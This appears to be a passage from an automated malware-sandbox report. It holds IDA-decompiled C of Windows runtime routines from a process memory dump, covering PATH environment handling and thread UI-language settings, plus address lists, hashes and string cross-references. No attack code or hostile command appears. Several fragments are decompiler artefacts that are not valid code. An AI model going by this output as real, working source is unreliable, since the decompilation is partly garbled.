						_t326 = L037E4620(_t287,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t278);
						_v52 = _t326;
						__eflags = _t326;
						if(_t326 == 0) {
							_t327 = 0xc0000017;
							goto L32;
						} else {
							 *(_t326 + 0x44) =  *(_t326 + 0x44) & 0x00000000;
							_t50 = _t326 + 0x48; // 0x48
							_t321 = _t50;
							_t308 = _v32;
							 *(_t326 + 0x3c) = _t278;
							_t280 = 0;
							 *((short*)(_t326 + 0x30)) = _v48;
							__eflags = _t308;
							if(_t308 != 0) {
								 *(_t326 + 0x18) = _t321;
								__eflags = _t308 - 0x38b8478;
								 *_t326 = ((0 | _t308 == 0x038b8478) - 0x00000001 & 0xfffffffb) + 7;
								E0380F3E0(_t321,  *((intOrPtr*)(_t308 + 4)),  *_t308 & 0x0000ffff);
								_t308 = _v32;
								_t337 = _t337 + 0xc;
								_t280 = 1;
								__eflags = _a8;
								_t321 = _t321 + (( *_t308 & 0x0000ffff) >> 1) * 2;
								if(_a8 != 0) {
									_t272 = E038539F2(_t321);
									_t308 = _v32;
									_t321 = _t272;
								}
							}
							_t291 = 0;
							_v16 = 0;
							__eflags = _v48;
							if(_v48 <= 0) {
								L31:
								_t327 = _v68;
								__eflags = 0;
								 *((short*)(_t321 - 2)) = 0;
								goto L32;
							} else {
								_t278 = _t326 + _t280 * 4;
								_v56 = _t278;
								do {
									__eflags = _t308;
									if(_t308 != 0) {
										_t237 =  *(_v60 + _t291 * 4);
										__eflags = _t237;
										if(_t237 == 0) {
											goto L30;
										} else {
											__eflags = _t237 == 5;
											if(_t237 == 5) {
												goto L30;
											} else {
												goto L22;
											}
										}
									} else {
										L22:
										 *_t278 =  *(_v60 + _t291 * 4);
										 *(_t278 + 0x18) = _t321;
										_t241 =  *(_v60 + _t291 * 4);
										__eflags = _t241 - 8;
										if(__eflags > 0) {
											goto L56;
										} else {
											switch( *((intOrPtr*)(_t241 * 4 +  &M037F2959))) {
												case 0:
													__ax =  *0x38b8488;
													__eflags = __ax;
													if(__ax == 0) {
														goto L29;
													} else {
														__ax & 0x0000ffff = E0380F3E0(__edi,  *0x38b848c, __ax & 0x0000ffff);
														__eax =  *0x38b8488 & 0x0000ffff;
														goto L26;
													}
													goto L122;
												case 1:
													L45:
													E0380F3E0(_t321, _v80, _v64);
													_t267 = _v64;
													goto L26;
												case 2:
													 *0x38b8480 & 0x0000ffff = E0380F3E0(__edi,  *0x38b8484,  *0x38b8480 & 0x0000ffff);
													__eax =  *0x38b8480 & 0x0000ffff;
													__eax = ( *0x38b8480 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													goto L28;
												case 3:
													__eax = _v44;
													__eflags = __eax;
													if(__eax == 0) {
														goto L29;
													} else {
														__esi = __eax + __eax;
														__eax = E0380F3E0(__edi, _v72, __esi);
														__edi = __edi + __esi;
														__esi = _v52;
														goto L27;
													}
													goto L122;
												case 4:
													_push(0x2e);
													_pop(__eax);
													 *(__esi + 0x44) = __edi;
													 *__edi = __ax;
													__edi = __edi + 4;
													_push(0x3b);
													_pop(__eax);
													 *(__edi - 2) = __ax;
													goto L29;
												case 5:
													__eflags = _v36;
													if(_v36 == 0) {
														goto L45;
													} else {
														E0380F3E0(_t321, _v76, _v36);
														_t267 = _v36;
													}
													L26:
													_t337 = _t337 + 0xc;
													_t321 = _t321 + (_t267 >> 1) * 2 + 2;
													__eflags = _t321;
													L27:
													_push(0x3b);
													_pop(_t269);
													 *((short*)(_t321 - 2)) = _t269;
													goto L28;
												case 6:
													__ebx =  *0x38b575c;
													__eflags = __ebx - 0x38b575c;
													if(__ebx != 0x38b575c) {
														_push(0x3b);
														_pop(__esi);
														do {
															 *(__ebx + 8) & 0x0000ffff = __ebx + 0xa;
															E0380F3E0(__edi, __ebx + 0xa,  *(__ebx + 8) & 0x0000ffff) =  *(__ebx + 8) & 0x0000ffff;
															__eax = ( *(__ebx + 8) & 0x0000ffff) >> 1;
															__edi = __edi + __eax * 2;
															__edi = __edi + 2;
															 *(__edi - 2) = __si;
															__ebx =  *__ebx;
															__eflags = __ebx - 0x38b575c;
														} while (__ebx != 0x38b575c);
														__esi = _v52;
														__ecx = _v16;
														__edx = _v32;
													}
													__ebx = _v56;
													goto L29;
												case 7:
													 *0x38b8478 & 0x0000ffff = E0380F3E0(__edi,  *0x38b847c,  *0x38b8478 & 0x0000ffff);
													__eax =  *0x38b8478 & 0x0000ffff;
													__eax = ( *0x38b8478 & 0x0000ffff) >> 1;
													__eflags = _a8;
													__edi = __edi + __eax * 2;
													if(_a8 != 0) {
														__ecx = __edi;
														__eax = E038539F2(__ecx);
														__edi = __eax;
													}
													goto L28;
												case 8:
													__eax = 0;
													 *(__edi - 2) = __ax;
													 *0x38b6e58 & 0x0000ffff = E0380F3E0(__edi,  *0x38b6e5c,  *0x38b6e58 & 0x0000ffff);
													 *(__esi + 0x38) = __edi;
													__eax =  *0x38b6e58 & 0x0000ffff;
													__eax = ( *0x38b6e58 & 0x0000ffff) >> 1;
													__edi = __edi + __eax * 2;
													__edi = __edi + 2;
													L28:
													_t291 = _v16;
													_t308 = _v32;
													L29:
													_t278 = _t278 + 4;
													__eflags = _t278;
													_v56 = _t278;
													goto L30;
											}
										}
									}
									goto L122;
									L30:
									_t291 = _t291 + 1;
									_v16 = _t291;
									__eflags = _t291 - _v48;
								} while (_t291 < _v48);
								goto L31;
							}
						}
					}
				} else {
					while(1) {
						L1:
						_t241 =  *(_v60 + _t319 * 4);
						if(_t241 > 8) {
							break;
						}
						switch( *((intOrPtr*)(_t241 * 4 +  &M037F2935))) {
							case 0:
								__ax =  *0x38b8488;
								__eflags = __ax;
								if(__eflags != 0) {
									__eax = __ax & 0x0000ffff;
									__ebx = __ebx + 2;
									__eflags = __ebx;
									goto L53;
								}
								goto L14;
							case 1:
								L44:
								_t308 =  &_v64;
								_v80 = E037F2E3E(0,  &_v64);
								_t278 = _t278 + _v64 + 2;
								goto L13;
							case 2:
								__eax =  *0x38b8480 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x38b8480;
									goto L94;
								}
								goto L14;
							case 3:
								__eax = E037DEEF0(0x38b79a0);
								__eax =  &_v44;
								_push(__eax);
								_push(0);
								_push(0);
								_push(4);
								_push(L"PATH");
								_push(0);
								L71();
								__esi = __eax;
								_v68 = __esi;
								__eflags = __esi - 0xc0000023;
								if(__esi != 0xc0000023) {
									L10:
									__eax = E037DEB70(__ecx, 0x38b79a0);
									__eflags = __esi - 0xc0000100;
									if(__eflags == 0) {
										_v44 = _v44 & 0x00000000;
										__eax = 0;
										_v68 = 0;
										goto L13;
									} else {
										__eflags = __esi;
										if(__esi < 0) {
											L32:
											_t215 = _v72;
											__eflags = _t215;
											if(_t215 != 0) {
												L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t215);
											}
											_t216 = _v52;
											__eflags = _t216;
											if(_t216 != 0) {
												__eflags = _t327;
												if(_t327 < 0) {
													L037E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t216);
													_t216 = 0;
												}
											}
											goto L36;
										} else {
											__eax = _v44;
											__ebx = __ebx + __eax * 2;
											__ebx = __ebx + 2;
											__eflags = __ebx;
											L13:
											_t287 = _v36;
											goto L14;
										}
									}
								} else {
									__eax = _v44;
									__ecx =  *0x38b7b9c; // 0x0
									_v44 + _v44 =  *[fs:0x30];
									__ecx = __ecx + 0x180000;
									__eax = L037E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), __ecx,  *[fs:0x30]);
									_v72 = __eax;
									__eflags = __eax;
									if(__eax == 0) {
										__eax = E037DEB70(__ecx, 0x38b79a0);
										__eax = _v52;
										L36:
										_pop(_t320);
										_pop(_t328);
										__eflags = _v8 ^ _t333;
										_pop(_t279);
										return E0380B640(_t216, _t279, _v8 ^ _t333, _t308, _t320, _t328);
									} else {
										__ecx =  &_v44;
										_push(__ecx);
										_push(_v44);
										_push(__eax);
										_push(4);
										_push(L"PATH");
										_push(0);
										L71();
										__esi = __eax;
										_v68 = __eax;
										goto L10;
									}
								}
								goto L122;
							case 4:
								__ebx = __ebx + 4;
								goto L14;
							case 5:
								_t274 = _v56;
								if(_v56 != 0) {
									_t308 =  &_v36;
									_t276 = E037F2E3E(_t274,  &_v36);
									_t287 = _v36;
									_v76 = _t276;
								}
								if(_t287 == 0) {
									goto L44;
								} else {
									_t278 = _t278 + 2 + _t287;
								}
								goto L14;
							case 6:
								__eax =  *0x38b5764 & 0x0000ffff;
								goto L53;
							case 7:
								__eax =  *0x38b8478 & 0x0000ffff;
								__ebx = __ebx + __eax;
								__eflags = _a8;
								if(_a8 != 0) {
									__ebx = __ebx + 0x16;
									__ebx = __ebx + __eax;
								}
								__eflags = __dl;
								if(__eflags != 0) {
									__eax = 0x38b8478;
									L94:
									_v32 = __eax;
								}
								goto L14;
							case 8:
								__eax =  *0x38b6e58 & 0x0000ffff;
								__eax = ( *0x38b6e58 & 0x0000ffff) + 2;
								L53:
								__ebx = __ebx + __eax;
								L14:
								_t319 = _t319 + 1;
								if(_t319 >= _v48) {
									goto L16;
								} else {
									_t308 = _v37;
									goto L1;
								}
								goto L122;
						}
					}
					L56:
					_t292 = 0x25;
					asm("int 0x29");
					asm("out 0x28, al");
					if(__eflags <= 0) {
						asm("o16 sub [edi+0x3], bh");
					}
					_t339 = _t337 + _t241;
					__eflags = _t339;
					asm("daa");
					if(__eflags <= 0) {
						if (__eflags > 0) goto L62;
					}
					_t241 = _t241 +  *((intOrPtr*)(_t326 + 0x28));
					__eflags = _t241;
				}
				L122:
			}

0x037f2584
0x037f2586
0x037f2590
0x037f2599
0x037f259e
0x037f25a4
0x037f25a9
0x037f25ac
0x037f25ae
0x037f25b1
0x037f25b2
0x037f25b5
0x037f25b8
0x037f25bb
0x037f25bc
0x037f25bf
0x037f25c2
0x037f25c5
0x037f25c6
0x037f25cb
0x037f25ce
0x037f25d8
0x037f25db
0x037f25dd
0x037f25de
0x037f25e1
0x037f25e3
0x037f25e9
0x037f26da
0x037f26da
0x037f26dd
0x037f26e2
0x03835b56
0x00000000
0x037f26e8
0x037f26f9
0x037f26fb
0x037f26fe
0x037f2700
0x03835b60
0x00000000
0x037f2706
0x037f2706
0x037f270a
0x037f270a
0x037f270d
0x037f2713
0x037f2716
0x037f2718
0x037f271c
0x037f271e
0x03835b6c
0x03835b6f
0x03835b7f
0x03835b89
0x03835b8e
0x03835b93
0x03835b96
0x03835b9c
0x03835ba0
0x03835ba3
0x03835bab
0x03835bb0
0x03835bb3
0x03835bb3
0x03835ba3
0x037f2724
0x037f2726
0x037f2729
0x037f272c
0x037f279d
0x037f279d
0x037f27a0
0x037f27a2
0x00000000
0x037f272e
0x037f272e
0x037f2731
0x037f2734
0x037f2734
0x037f2736
0x03835bc1
0x03835bc1
0x03835bc4
0x00000000
0x03835bca
0x03835bca
0x03835bcd
0x00000000
0x03835bd3
0x00000000
0x03835bd3
0x03835bcd
0x037f273c
0x037f273c
0x037f2742
0x037f2747
0x037f274a
0x037f274d
0x037f2750
0x00000000
0x037f2756
0x037f2756
0x00000000
0x037f2902
0x037f2908
0x037f290b
0x00000000
0x037f2911
0x037f291c
0x037f2921
0x00000000
0x037f2921
0x00000000
0x00000000
0x037f2880
0x037f2887
0x037f288c
0x00000000
0x00000000
0x037f2805
0x037f280a
0x037f2814
0x037f2816
0x00000000
0x00000000
0x037f281e
0x037f2821
0x037f2823
0x00000000
0x037f2829
0x037f2829
0x037f2831
0x037f283c
0x037f283e
0x00000000
0x037f283e
0x00000000
0x00000000
0x037f284e
0x037f2850
0x037f2851
0x037f2854
0x037f2857
0x037f285a
0x037f285c
0x037f285d
0x00000000
0x00000000
0x037f275d
0x037f2761
0x00000000
0x037f2767
0x037f276e
0x037f2773
0x037f2773
0x037f2776
0x037f2778
0x037f277e
0x037f277e
0x037f2781
0x037f2781
0x037f2783
0x037f2784
0x00000000
0x00000000
0x03835bd8
0x03835bde
0x03835be4
0x03835be6
0x03835be8
0x03835be9
0x03835bee
0x03835bf8
0x03835bff
0x03835c01
0x03835c04
0x03835c07
0x03835c0b
0x03835c0d
0x03835c0d
0x03835c15
0x03835c18
0x03835c1b
0x03835c1b
0x03835c1e
0x00000000
0x00000000
0x037f28c3
0x037f28c8
0x037f28d2
0x037f28d4
0x037f28d8
0x037f28db
0x03835c26
0x03835c28
0x03835c2d
0x03835c2d
0x00000000
0x00000000
0x03835c34
0x03835c36
0x03835c49
0x03835c4e
0x03835c54
0x03835c5b
0x03835c5d
0x03835c60
0x037f2788
0x037f2788
0x037f278b
0x037f278e
0x037f278e
0x037f278e
0x037f2791
0x00000000
0x00000000
0x037f2756
0x037f2750
0x00000000
0x037f2794
0x037f2794
0x037f2795
0x037f2798
0x037f2798
0x00000000
0x037f2734
0x037f272c
0x037f2700
0x037f25ef
0x037f25ef
0x037f25ef
0x037f25f2
0x037f25f8
0x00000000
0x00000000
0x037f25fe
0x00000000
0x037f28e6
0x037f28ec
0x037f28ef
0x037f28f5
0x037f28f8
0x037f28f8
0x00000000
0x037f28f8
0x00000000
0x00000000
0x037f2866
0x037f2866
0x037f2876
0x037f2879
0x00000000
0x00000000
0x037f27e0
0x037f27e7
0x037f27e9
0x037f27eb
0x03835afd
0x00000000
0x03835afd
0x00000000
0x00000000
0x037f2633
0x037f2638
0x037f263b
0x037f263c
0x037f263e
0x037f2640
0x037f2642
0x037f2647
0x037f2649
0x037f264e
0x037f2650
0x037f2653
0x037f2659
0x037f26a2
0x037f26a7
0x037f26ac
0x037f26b2
0x03835b11
0x03835b15
0x03835b17
0x00000000
0x037f26b8
0x037f26b8
0x037f26ba
0x037f27a6
0x037f27a6
0x037f27a9
0x037f27ab
0x037f27b9
0x037f27b9
0x037f27be
0x037f27c1
0x037f27c3
0x037f27c5
0x037f27c7
0x03835c74
0x03835c79
0x03835c79
0x037f27c7
0x00000000
0x037f26c0
0x037f26c0
0x037f26c3
0x037f26c6
0x037f26c6
0x037f26c9
0x037f26c9
0x00000000
0x037f26c9
0x037f26ba
0x037f265b
0x037f265b
0x037f265e
0x037f2667
0x037f266d
0x037f2677
0x037f267c
0x037f267f
0x037f2681
0x03835b49
0x03835b4e
0x037f27cd
0x037f27d0
0x037f27d1
0x037f27d2
0x037f27d4
0x037f27dd
0x037f2687
0x037f2687
0x037f268a
0x037f268b
0x037f268e
0x037f268f
0x037f2691
0x037f2696
0x037f2698
0x037f269d
0x037f269f
0x00000000
0x037f269f
0x037f2681
0x00000000
0x00000000
0x037f2846
0x00000000
0x00000000
0x037f2605
0x037f260a
0x037f260c
0x037f2611
0x037f2616
0x037f2619
0x037f2619
0x037f261e
0x00000000
0x037f2624
0x037f2627
0x037f2627
0x00000000
0x00000000
0x03835b1f
0x00000000
0x00000000
0x037f2894
0x037f289b
0x037f289d
0x037f28a1
0x03835b2b
0x03835b2e
0x03835b2e
0x037f28a7
0x037f28a9
0x03835b04
0x03835b09
0x03835b09
0x03835b09
0x00000000
0x00000000
0x03835b35
0x03835b3c
0x037f28fb
0x037f28fb
0x037f26cc
0x037f26cc
0x037f26d0
0x00000000
0x037f26d2
0x037f26d2
0x00000000
0x037f26d2
0x00000000
0x00000000
0x037f25fe
0x037f292d
0x037f292f
0x037f2930
0x037f2935
0x037f2937
0x037f2939
0x037f2939
0x037f293c
0x037f293c
0x037f293e
0x037f293f
0x037f2941
0x037f2941
0x037f2944
0x037f2944
0x037f2944
0x00000000

Strings

PATH, xrefs: 037F2642, 037F2691

Memory Dump Source

Source File: 00000002.00000002.510955311.00000000037A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037A0000, based on PE: true

Associated: 00000002.00000002.510955311.00000000038BB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.510955311.00000000038BF000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37a0000_help.jbxd

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: e12572a6699f798bba3e15fefbf5d312b5ca229f7652213b75b36d0f7cbb1f22
Instruction ID: 42bc3e23a1ec1ab982c11dc30204710b259816ad024272d9acbf13e1ca21f975
Opcode Fuzzy Hash: e12572a6699f798bba3e15fefbf5d312b5ca229f7652213b75b36d0f7cbb1f22
Instruction Fuzzy Hash: 59C19079E00219DFCB15DFA8D880BAEB7B5FF49710F184469E601EB391E734A941DB60

Uniqueness

Uniqueness Score: -1.00%

Function 037FFAB0 Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E037FFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E037DEEF0(0x38b7b60);
					_t134 =  *0x38b7b84; // 0x77de7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x38b7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x38b7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E037D6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E037D76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E03868938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E037CB150();
													}
													_t116 = E03866D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E037D75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x38b8638; // 0x0
																	_t122 = L037D38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E037D76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E037D76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L037FFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L037D70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E037FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E037FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E037FFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E037FFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E037FFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x38b7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x38b7b84 = _t75;
						_t73 = E037DEB70(_t134, 0x38b7b60);
						if( *0x38b7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E037DFF60( *0x38b7b20);
							}
						}
						goto L5;
					}
				}
			}

0x037ffab0
0x037ffab2
0x037ffab3
0x037ffab4
0x037ffabc
0x037ffac0
0x037ffb14
0x037ffb17
0x037ffac2
0x037ffac8
0x037ffacd
0x037ffad3
0x037ffad3
0x037ffadd
0x037ffb18
0x037ffb1b
0x037ffb1d
0x037ffb1e
0x037ffb1f
0x037ffb20
0x037ffb21
0x037ffb22
0x037ffb23
0x037ffb24
0x037ffb25
0x037ffb26
0x037ffb27
0x037ffb28
0x037ffb29
0x037ffb2a
0x037ffb2b
0x037ffb2c
0x037ffb2d
0x037ffb2e
0x037ffb2f
0x037ffb3a
0x037ffb3b
0x037ffb3e
0x037ffb41
0x037ffb44
0x037ffb47
0x037ffb4a
0x037ffb4d
0x037ffb53
0x0383bdcb
0x0383bdcb
0x037ffb59
0x037ffb5b
0x037ffb5b
0x037ffb5e
0x0383bdd5
0x0383bdd8
0x00000000
0x0383bdda
0x00000000
0x0383bdda
0x037ffb64
0x037ffb64
0x037ffb64
0x037ffb67
0x037ffb6e
0x037ffb70
0x037ffb72
0x00000000
0x037ffb78
0x037ffb7a
0x037ffb7a
0x037ffb7d
0x037ffb80
0x0383bddf
0x0383bde1
0x00000000
0x0383bde3
0x00000000
0x0383bde3
0x037ffb86
0x037ffb86
0x037ffb86
0x037ffb8b
0x037ffb90
0x037ffb92
0x037ffb94
0x037ffb9a
0x037ffb9b
0x037ffba1
0x0383bde8
0x0383bdeb
0x0383bded
0x0383beb5
0x0383beb5
0x0383bebb
0x0383bebd
0x0383bec3
0x0383bed2
0x0383bedd
0x0383bedd
0x0383beed
0x00000000
0x0383bdf3
0x0383bdfe
0x0383be06
0x0383be0b
0x0383be0d
0x0383be0f
0x0383be14
0x0383be19
0x0383be20
0x0383be25
0x0383be27
0x0383be35
0x0383be39
0x0383be46
0x0383be4f
0x0383be54
0x0383be56
0x0383bef8
0x0383bef8
0x00000000
0x0383be5c
0x0383be5c
0x0383be60
0x00000000
0x0383be66
0x0383be66
0x0383be7f
0x0383be84
0x0383be87
0x0383be89
0x0383be8b
0x0383be99
0x0383be9d
0x0383bea0
0x0383beac
0x0383beaf
0x0383beb1
0x0383beb3
0x0383beb3
0x00000000
0x0383bea2
0x0383bea2
0x00000000
0x0383bea2
0x0383be8d
0x0383be8d
0x0383be92
0x00000000
0x0383be92
0x0383be8b
0x0383be60
0x0383be3b
0x0383be3b
0x0383be3e
0x00000000
0x0383be40
0x0383be40
0x0383be44
0x00000000
0x00000000
0x00000000
0x00000000
0x0383be44
0x0383be3e
0x0383be29
0x0383be29
0x00000000
0x0383be29
0x0383be27
0x00000000
0x037ffba7
0x037ffba7
0x037ffbab
0x0383bf02
0x037ffbb1
0x037ffbb1
0x037ffbb8
0x037ffbbd
0x037ffbbd
0x037ffbbf
0x037ffbbf
0x037ffbc5
0x037ffbcb
0x037ffbf8
0x037ffbf8
0x037ffbfa
0x00000000
0x037ffc00
0x037ffc00
0x037ffc03
0x00000000
0x037ffc09
0x037ffc09
0x037ffc0f
0x037ffc15
0x037ffc23
0x037ffc23
0x037ffc25
0x037ffc27
0x037ffc75
0x037ffc7c
0x037ffc84
0x00000000
0x037ffc29
0x037ffc29
0x037ffc2d
0x037ffc30
0x0383bf0f
0x00000000
0x037ffc36
0x037ffc38
0x037ffc3b
0x037ffc41
0x0383bf17
0x0383bf19
0x0383bf48
0x0383bf4b
0x00000000
0x0383bf1b
0x0383bf22
0x0383bf24
0x0383bf26
0x00000000
0x0383bf2c
0x0383bf37
0x0383bf39
0x0383bf3b
0x00000000
0x0383bf41
0x0383bf41
0x0383bf41
0x0383bf41
0x0383bf45
0x00000000
0x0383bf45
0x0383bf3b
0x0383bf26
0x00000000
0x037ffc47
0x037ffc47
0x037ffc49
0x037ffcb2
0x037ffcb4
0x037ffcb6
0x037ffcdc
0x037ffcdc
0x00000000
0x037ffcb8
0x037ffcc3
